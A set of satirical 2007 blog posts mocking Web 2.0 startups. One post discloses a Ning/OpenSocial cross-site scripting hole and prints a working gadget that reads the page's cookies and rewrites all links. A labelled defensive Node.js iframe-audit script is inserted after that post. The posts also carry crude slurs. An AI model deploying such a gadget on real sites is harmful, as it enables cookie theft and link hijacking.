Advice from papa Harold

Posted by harold at December 19th, 2007

Since I’m on vacation (and I hope you are, too! Happy Holidays!), I decided to write a “normal” blog post. Here goes:

Cocaine flavored doughnuts seem to be quite popular in Palo Alto these days. Why? I don’t know. It might just be because we’ve unwittingly become the favorite retirement location of ’80s traders, who, after years of heart attacks, now want to slow down a bit and serve as venture capitalists. And by serve, I mean continue to ravage the markets for personal gain, all the while screwing up most of the time anyway. For those of you out in the real world, this should explain a lot. Alan Greenspan’s quite famous irrational exuberance wasn’t due to any sort of failure of the market after all. It’s actually about crackheads controlling the purse strings in this county.

And when crackheads prevail, sexist walnuts can’t be far behind. That, also, should make perfect sense, considering that Silicon Valley has an approximate 7:1 male to female ratio (not including stray canines, who seem to have no problem whatsoever replicating furiously). When you combine the California sun and surf with computer nerds and throngs of wannabes, the unfortunate consequences are far worse than those of liposuction. Put simply, the creative tech culture is imploding in on itself in a fury of 170-hour work weeks, only to be replaced by a bunch of sterile websites. Like that one social networking site for lobsters. Killer idea, guys!

Woe is the engineer who just wants to live the simple life today. What with traffic, rent and food prices through the roof, an overabundance of crackheads, and a distinct lack of culture, all that’s left to do is work. And that’s very sad because hacking around in one’s free time is really where all the innovation starts. Maybe a little LSD if you’re from the east bay, but just as likely it’s about getting electrocuted one too many times and suddenly coming up with an idea for genetically engineered peanut butter. Or something. You probably didn’t notice, but I’m a little off my rocker today. Those recalcitrant hedgehogs are really gnawing at me.

But the point is, money does not compensate for living like a robot in a trash can. Take that advice wisely, youngfolk, as you go to work for the latest dot-bomb startup (version 2.0). You’re only young once, so you might as well take a shower now and then and maybe plant some geraniums in your yard before you get arthritis. That is, if you even have a yard. Trust me, gardening is far better than cocaine. If you’re really clever, you can even combine the two. But having friends helps. Walnuts, not so much. It’s all a matter of perspective. I prefer pine nuts, myself. They’re far more progressive.

So maybe California isn’t the best place in the universe. Me, I’ve found my own little home away from home volunteering in Sudan. But South Carolina is just as good—be careful not to exploit any migrant workers. They’re people too, you know. And unlike the ones in northern California, they don’t even get stock options. Just slow down and stomp on the daisies. Fucking daisies, I hate ‘em. Maybe something will happen. Maybe you’ll get a life. It’s important to do whatever, you know. Crawl around, find the life that suits you, and hope to hell that it doesn’t all go down the toilet one fine morning in February. Certainly beats getting fat on doughnuts, I guess.

Posted in Web 2.0| 6 Comments | 

Death Valley (part 2)

Posted by harold at November 22nd, 2007

Okay so actually, Phil (my neighborhood crack dealer) mentioned that there are still a couple of tech companies out there. And I mean organizations that actually are results-oriented rather than wasting-peoples’-time-on-stupid-stuff oriented. Yes, I know it’s hard to believe. One of the better performing (well, before this week’s stock disaster) firms is VMware. As anyone with half a brain knows, VMware is a software company with a focus on delivering virtualization solutions on x86 architecture PCs. Based off research done in Mendel Rosenblum’s research group at Stanford back in the late 90’s, VMware completely changed the face of machine virtualization by offering blazing fast speeds on quirky commodity hardware (interested in the details? Read this paper). But it’s not all fun and games and fairies and daisies and lightly salted french fries. The x86 architecture with all its quirks is not naturally virtualizable under Popek’s and Goldberg’s canonical definition. To be naturally virtualizable, all privileged or sensitive instructions must generate a trap. On x86, there are at least 17 instructions in the base instruction set which violate this key property. As a result, trying to correctly virtualize the x86 is equivalent to attempting to drive a Yugo through Death Valley. Oh sure you can do it, but you’ll probably break down after about 10 feet. 11 and a half if you’re lucky. VMware claims their virtual machine is totally isolated, but hey, we all know it’s only a matter of time before someone breaks the isolation. Now I know legend has it that they convinced the NSA to use VMware… but I also happen to know that my old buddies at the NSA loved to claim they internally used products which in reality they knew exactly how to crack. Hehe.

Oh yeah so anyway, another one of these technology-oriented companies based in the Valley is Coverity. You might need three quarters of a brain to have heard of them, since they’re developer-oriented (half a brain and a quarter pounder with swiss would probably work too). This company produces tools which perform source code analysis in order to improve the software development process. Sounds like a pretty big deal to me… as we all know, bugs in software love to cause problems. However, your average VC didn’t see it that way. For example, rather than providing capital to Coverity, Sequoia decided to pour money into stupid little abominations like TokBox, which is a startup that combines the power of rounded corners and the built-in video and webcam support in Flash. Rather than thinking, Sequoia decided to throw good money at an inconsequential little trinket, and now they’re paying for it (I’ve heard the TokBox team is, ahem, “brilliant”). Coverity, on the other hand, has managed to grow to a respectable level of profitability based on, no not ads, certainly not VC funding… wait for it… innovations that deliver true value to customers. Hint to VCs: next time you see a company that’s developed innovative tools for finding ever more of those nasty bugs lurking in our code bases–give THEM the money! Not the guy who invented arsenic-flavored chalk candybars.

Well folks, we’ve gone through the bad, we’ve glimpsed at the good that remains. Now it’s up to all of us to decide whether the tech industry goes in the gutter or goes for the gold. It’s a simple decision, surely. But executing on it just seems to be a little too difficult given the apparent rampancy of zombies in the Valley today.

Posted in Web 2.0| No Comments | 

Death Valley (part 1)

Posted by harold at November 14th, 2007

Facebook. Digg. Google. Three companies I’ve heard way too much about this past week. Oddly enough, those names all have at least three things in common (good things come in threes… yeah right): they’re headquartered in the San Francisco Bay Area, they depend on the social factor (read: the online equivalent of STDs), and finally, they’re all wrapped up in the whole advertising thing. Not to mention, out of the three companies I mentioned, only Google ever even had any technology worth mentioning to back up their infamy. Of course Google too is now practically cruising on search and spending ridiculous wads of cash on promoting other projects (read: AdSense). This whole Web 2.0 mindset of “we need more ads to get more money” has quite tragically far surpassed all true innovation in the Valley.

Google is not the worst offender in this market. Earlier this week in New York City, Facebook announced its Social Ads program, which is apparently a behavioral-targeting system for advertisers. Every time some worthless syphilis-infected Facebook user decides to buy some useless trinket, a notification of that purchase will be broadcast across their Facebook buddies’ news feeds. Sounds great doesn’t it? As if Facebook weren’t already privacy invasion central. Of course all the company executives invited to the launch event loved the idea. Even my local crack dealer down on the corner told me this “will give Google a run for its money.” And speaking of coke, now you can even add products like Coca-Cola as your dearest dearest friend. Thanks Facebook! I don’t know about you, but when was the last time you considered your can of Coke “social?” I mean heroin or something, sure. But soda pop?

All those ads-that-pay-for-everything are pretty stupid. So’s all the attention surrounding these halfwit Web 2.0 startups. Recently, everybody was circulating rumors about how Digg was considered to be an acquisition target by Yahoo. Who gives a damn? Digg is just another web startup with a pretty large user base submitting stories. Heck, if you added up the IQs of all of its users, it may even be a little above 10 by now. Hallelujah! What’s the difference between Digg and a waterlogged phonebook? Not a whole lot. I’d much rather be pruning my exquisite collection of Bonsai Trees. With fingernail clippers, no less.

But this all brings up some bigger questions: what’s wrong with this picture? What has happened to technology? Half a century after the rise of Silicon Valley as a breeding ground for innovative technology-oriented companies, have we hit a pothole the size of Jupiter? Is this the best Silicon Valley can come up with? Top tier companies fighting over advertising surface area for Joe-Bob’s snail training guide and “Enlarge Your Leprechaun in 35 Days!”? Whatever happened to the legendary competition between AMD and Intel, E. coli and Jack in the Box, heck even Netscape and Microsoft’s (incredibly lame) Internet Explorer? Quite plainly, the Valley has been flooded with yet-another-poorly-designed-web-2.0-social website (and clones thereof). Where have all the techboys gone?

To be continued…

Posted in Web 2.0| 3 Comments | 

Peer Prescience

Posted by harold at November 3rd, 2007

Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash sometimes—but this time I’m going to back it up with the facts and let you decide, doc.

It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. Ok, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary JavaScript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.

On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of people’s profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.

But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source to Berlinetta’s page:

<iframe id="embeddingFrame" ...
src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile">
</iframe>

Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side. Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to oh, push the gate open and walk in? But we don’t have to wonder, we can know.

Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Splendid!" />
<Content type="html"><![CDATA[
<script language="javascript">

function exploit() {
  var doc = window.top.document;
  var a = doc.getElementsByTagName('a');
  for (var i = 0; i < a.length; i++) {
    if (a[i].hasAttribute('href')) {
      a[i].setAttribute('href',
        'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
    }
  }
  document.getElementById('done').innerHTML
  = document.cookie;
}

</script>
<font color="#ffffff"><form>
<center>Click this button to make all of the links
        on this page go to haroldtherebel.com:<br/>
<input type="button" onclick="exploit();"
       value="Exploit now!"><br/>
cook-ease:<br/>
<textarea id="done" rows="10" cols="60"></textarea></center>
</form></font>
]]></Content>
</Module>

The exploit really stands for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe comes from the same server as the main page, your browser is more than happy to honor that request. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!
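An added example, not code from the original post or from Ning or Google: a small Node.js audit that resolves each gadget iframe's src against the embedding page and reports whether script in that frame could reach window.top.document. The page URL, host names and sample markup are constructed (only the gadgetWrapper path shape follows the iframe quoted above), and the sandbox attribute it checks is a later browser feature than the setup described here.

```javascript
// Added example: audit embedded gadget frames for parent-DOM reachability.
// PAGE_URL and SAMPLE_HTML are constructed; only the gadgetWrapper path shape
// follows the iframe quoted in the post.
const PAGE_URL = 'http://social.example/profile/berli'; // hypothetical host

const SAMPLE_HTML = `
<iframe id="embeddingFrame" src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fgadgets.example%2Fsplendid.xml&mode=profile"></iframe>
<iframe id="isolated" src="http://gadgets-sandbox.example/render?url=http%3A%2F%2Fgadgets.example%2Fsplendid.xml"></iframe>
<iframe id="sandboxed" sandbox="allow-scripts" src="/gadgets/index/gadgetWrapper?url=x"></iframe>
<iframe id="pointless" sandbox="allow-scripts allow-same-origin" src="/gadgets/index/gadgetWrapper?url=x"></iframe>
`;

// Pull one attribute out of a single <iframe ...> tag (enough for this sample,
// not a general HTML parser). Returns null when the attribute is absent.
function attr(tag, name) {
  const m = tag.match(new RegExp('\\s' + name + '\\s*=\\s*"([^"]*)"', 'i'));
  return m ? m[1] : null;
}

// Can script in this frame reach window.top.document of the embedding page?
function auditFrame(tag, pageUrl) {
  const page = new URL(pageUrl);
  const frame = new URL(attr(tag, 'src') || 'about:blank', page); // resolves a relative src
  const sandbox = attr(tag, 'sandbox');
  const tokens = sandbox === null ? null : sandbox.toLowerCase().split(/\s+/).filter(Boolean);
  // Same origin means same scheme, host and port; nothing else is compared.
  const sameOrigin = frame.origin === page.origin;
  // A sandbox without allow-same-origin forces the frame into an opaque origin.
  const opaque = tokens !== null && !tokens.includes('allow-same-origin');
  const canScript = tokens === null || tokens.includes('allow-scripts');
  return {
    id: attr(tag, 'id'),
    frameOrigin: frame.origin,
    parentDomReachable: sameOrigin && !opaque && canScript,
  };
}

function auditPage(html, pageUrl) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  return tags.map((t) => auditFrame(t, pageUrl));
}

for (const r of auditPage(SAMPLE_HTML, PAGE_URL)) {
  console.log(`${r.id}: origin=${r.frameOrigin} parent DOM reachable=${r.parentDomReachable}`);
}
```

The relative src is what matters: it resolves to the host page's own origin, so the frame is a frame in name only. Serving the wrapper from a separate host, or sandboxing it without allow-same-origin, is what flips the result.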

Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborers making tennis shoes in south-east Asia any day.

Posted in Programming, Web 2.0| 20 Comments | 

The so-called “Web 2.0”

Posted by harold at October 27th, 2007

Hi. My name is Harold. I live in Sudan. Or maybe not. It doesn’t really matter all that much. What does matter is that far too many stupid companies with stupid ideas are getting far too much funding today from stupid people with access to altogether far too much money. Again. And again. And that, dear readers, is where I come in: to stop the insanity. To shatter the inanity.

I’ll admit, I’m no outsider to venture capital deals—or the valley itself, for that matter (um, the Nile river valley, of course…). But the pharaohs of my day somehow seemed wiser. Ok, maybe “wise” isn’t the best way to describe a VC. Nonetheless, today there abounds a very special breed of stupidity that just wasn’t around twenty years ago. Let’s be blunt about it: it’s called Web 2.0, and it’s written that way because in the end, it’s a big fat zero.

My big concern is that all this “Web 2.0” nonsense is merely a shell game. Sure, the pea is in there alright, but it’s a lot smaller and more shriveled up than all the effort being poured in to pursue it would suggest. I would definitely be the first to admit that it can be amusing at times to stuff a pea up your nose—well worth the trip to the emergency room—but that little pea is still lacking in the critical vitamins and nutrients that you might get by shoving, say, a whole steak up your nose.

The same is true in technology. For example, consider that wonderful little gem known as justin.tv. If you have any vestiges of intelligence, you’ve never heard of it, so I’ll tell you what it is: it’s a site where people who have no life broadcast their lives over the internet, so people with even less of a life can live vicariously through them. Kind of entertaining maybe for 5 seconds, until the site starts making noise while I’m sitting in the library. But honestly folks, it’s a waste of effort. And a waste of Y Combinator’s funding… not to mention, a disgrace to the theory of fixed points!

We could go on, but let’s not waste any more time today. It’s going to take some careful analysis and tenacious exposition to rout this Web 2.0 scourge. They don’t call me a rebel for nothing. After all, my truck does have a confederate flag bumper sticker left over from the previous owners. But hey, at least it’s not pastel with rounded corners.

Posted in Web 2.0| 5 Comments |